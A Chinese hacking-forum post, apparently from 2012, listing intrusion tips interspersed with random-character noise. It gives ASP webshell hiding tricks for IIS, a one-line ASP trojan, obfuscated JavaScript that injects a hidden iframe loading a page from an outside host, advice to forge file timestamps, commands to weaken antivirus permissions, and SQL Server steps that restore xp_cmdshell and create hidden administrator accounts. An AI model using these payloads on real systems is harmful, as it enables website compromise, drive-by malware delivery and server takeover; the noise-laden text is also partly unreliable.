5 D% M, j2 T; Q' \+ X拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
/ ~4 ? t8 \$ @9 a) i& L! k通过web访问ASP木马:http://ip/images../news.asp?action=login, r9 _; z; [+ c5 p h7 Q+ O* y" e
如何删除非标准目录:rmdir images..\ /s
7 ]! L" h* q, [6 J2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:! X; J: w; ^! e2 X5 g
mkdir programme.asp! m! l# r7 a/ Q. O" \8 A$ R, ^! D! i
新建1.txt文件内容:<!--#include file=”12.jpg”-->& j) L D0 f2 W. v
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件6 O& A6 c, T+ @# I
attrib +H +S programme.asp2 W* K4 [$ j7 g/ x; l6 h
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
/ [) _# i- W' T- ?: F
* F! g% W2 c. |. Q7 V54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。, m. V* z; k e
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
9 V& X+ L. z* O- r+ v+ s) n
* Z5 d6 ^9 n. p$ Y( d& x55、JS隐蔽挂马
7 I' q; N# @0 O% H+ @1.
4 P' {* p; O1 U3 Ivar tr4c3="<iframe src=ht";
8 P3 I+ d% O# {% Y: ^% Ztr4c3 = tr4c3+"tp:/";) K0 K- W7 {0 N+ @, A
tr4c3 = tr4c3+"/ww";
9 `! l( P1 M9 Str4c3 = tr4c3+"w.tr4";
: ~ y, h7 Y8 a% x: ttr4c3 = tr4c3+"c3.com/inc/m";# \0 ~7 J( @$ j, p0 N
tr4c3 = tr4c3+"m.htm style="display:none"></i";- M1 W: T. l' J9 k/ y" A U3 B
tr4c3 =tr4c3+"frame>'";
8 O. v0 ]1 m8 S% }document.write(tr4c3);
9 H' \$ F" Q6 C2 i' U- i避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
: f8 K$ g6 \1 n4 V+ c' n s5 P6 {0 w3 A9 s! Q. l
2." f8 J" c/ J# }
转换进制,然后用EVAL执行。如* [, r9 e! a& M7 ~. Z- [3 x; D
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
1 N: f$ Y, ?& I4 E$ H! S" A4 G% M不过这个有点显眼。7 |7 j7 a+ h) X: a# Z# [% P
3.3 d) h# b* f% {6 m
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');% y. g6 k8 P) ]% T, Q
最后一点,别忘了把文件的时间也修改下。& t7 R# }& w: X- ^$ h
, @; C5 m& ?$ }! C; ~ V, |
56.3389终端入侵常用DOS命令& u; u/ a* Y6 u
taskkill taskkill /PID 1248 /t/ _4 a1 h) p' ?7 H
, N9 R+ J5 y3 _' I( ]4 Qtasklist 查进程/ n0 |/ E7 \% R- p* f: P
5 H; a; }5 l* bcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
+ ?3 w$ F- b- Q1 B; b( O/ K1 \' y7 hiisreset /reboot
& u! e/ E! \8 B, O6 @& U! D' X" ntsshutdn /reboot /delay:1 重起服务器$ D6 M( z7 s, C2 x/ A
- v/ r% `" q4 a- a9 n5 u; W. k% ilogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
9 ], y8 U2 r2 z) O, B- L6 R: T: ?0 r5 ^" ^8 U7 f0 F, U8 H
query user 查看当前终端用户在线情况. J4 R! R+ E1 m% m! j0 U
7 V; P- t9 T8 @. k' a
要显示有关所有会话使用的进程的信息,请键入:query process *4 v u: S/ q& C2 u2 x3 @. v
4 x' X5 q" ~/ k! L7 q- i6 o2 Y ?要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
) ]3 f9 e* y5 Q: W* B4 p; B
. J& s, P# |/ ]0 k" r要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
# O) K. W/ J: `5 f; _
2 D* q0 [ H( p# }要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
- |) _1 `2 g2 ]) K* q; ]1 D5 h+ ]* L4 {0 Q ~
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启1 I0 x5 d1 Q. w2 H& m
, u/ m* d- o+ i+ @命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统. ^/ d8 _& |3 m! K( k
) {' U; [& r0 u* w) Z3 z. A1 o
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。' K. ]+ g$ I( I( p
5 O9 X, \6 z# u! O2 U
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
- o8 I* K! E i
- q! x( I: h' e! V' K. T56、在地址栏或按Ctrl+O,输入:
( s' s, F! o: H4 m2 ejavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;$ M, E! |9 ~5 r1 w; y1 K
. `' l7 J3 J, D1 r, @/ r' b源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。: l8 H" y) i- n9 z3 Z1 F
9 N5 O$ f8 V; U57、net user的时候,是不能显示加$的用户,但是如果不处理的话,* R F) E' f5 \( c+ w3 [
用net localgroup administrators是可以看到管理组下,加了$的用户的。
; L0 `4 Y: y/ N" @' t% G9 R5 E& d5 Q2 f. \
58、 sa弱口令相关命令! E* n* u( F. J3 m% I: D
! M8 Y; Q. b9 ^2 v4 K& l m( ^# f( v
一.更改sa口令方法:. A, p+ K3 p4 i1 b1 o _. i3 t' B
用sql综合利用工具连接后,执行命令:
" |& U7 `1 n7 G. d' [$ sexec sp_password NULL,'20001001','sa'
$ @) V9 v+ n( q' X(提示:慎用!)) R3 N+ t7 V% b3 u3 f m
/ h) C0 K; |. `7 w二.简单修补sa弱口令.
0 t- q( H- y( g }8 h
# q6 {% m5 _4 O1 l方法1:查询分离器连接后执行:
2 @5 V" f7 y |: a; k# iif exists (select * from
1 _3 ]- ]3 e/ |# I D1 e6 ]dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
. n- q) c1 O6 N0 m2 TOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
, p+ J' W5 d S8 k) R- C5 p7 i& {% I/ Y- p! }$ }
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
: x: ?' V' E, ]( t' r
# z6 e! }3 M; K" h2 J5 _GO
8 q* L( }( o* o s: J" D( T0 g p
' t, M) @8 l. W. L" }% d+ G然后按F5键命令执行完毕! o" K9 P6 u; W* b* M
$ V. |5 U5 B9 P6 @# W2 E
方法2:查询分离器连接后
7 \9 g9 I* Y# s( N0 U8 T第一步执行:use master
* }- M+ W' a# \) n" M第二步执行:sp_dropextendedproc 'xp_cmdshell'# J6 D- }! _ _( |) B# b1 ^
然后按F5键命令执行完毕, X: C5 O0 T: [7 P# j
8 w3 B/ i$ p5 F/ ^. o' P- w$ \. o9 M- G) s) r. w
三.常见情况恢复执行xp_cmdshell.
. x. |6 g8 i7 E; K( G: M/ a7 R+ V8 z, Y- T8 A! ^
) ]* m3 Q/ b1 n/ e. I$ v$ s1 y
1 未能找到存储过程'master..xpcmdshell'.; }8 W( }( e. m8 j
恢复方法:查询分离器连接后,
; X; i8 X7 j- _, G M. u第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
' B2 e/ Z& H( D% \) N4 c6 J" ^第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'1 ~+ E( g+ v- A p* T$ }! v
然后按F5键命令执行完毕
& W9 l$ Z, e! t- f1 K
9 o6 z2 e% a! E% V2 p1 s2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)/ p! T3 t! p; v3 M4 w+ r' ]$ M
恢复方法:查询分离器连接后,
) z& x. T5 Z- O. t" k |5 q, S第一步执行:sp_dropextendedproc "xp_cmdshell"
! q7 x5 ^6 q5 f/ |第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
, b* A4 c6 P6 @$ b& c然后按F5键命令执行完毕4 q X/ U# r# `6 E3 E; w4 M
- a. q, p* s+ J/ {; e. P S* z5 k5 E3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)/ V' K; x( s4 U! Y$ |
恢复方法:查询分离器连接后,* L3 w% z5 d Z! f$ Q& f- P! b
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'7 b) Z+ I+ H5 ?3 |
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
: p& R! ]9 A* k2 o然后按F5键命令执行完毕: D$ S* J$ D8 H; u O r$ N6 [+ f% H
9 D7 \+ q* Z% C1 E% |四.终极方法.
6 N# P# H! p5 ^如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
1 ]" L( H1 q4 W' G7 q! y, [查询分离器连接后,& ^/ Z. H% t$ `' k0 K* |% |
2000servser系统:( h( H9 n/ j. \- Z- N
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
. F8 W, O0 q: V' T. Z/ R8 E# K. O; k- c: t, h/ q
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
/ q- A: Z( r* b# R8 \3 k! r
3 k9 s# S% t" \5 @xp或2003server系统:
& q; }' p, n; q* u! K' O; l3 l1 o3 W5 s! b6 q
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
" ]' J& j2 U$ v: o" G2 C: B P) o/ a. ^/ V
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'4 `/ ~2 l$ Q5 C$ `% y7 o
|
发表于 2012-9-15 14:51:03
收藏
支持
反对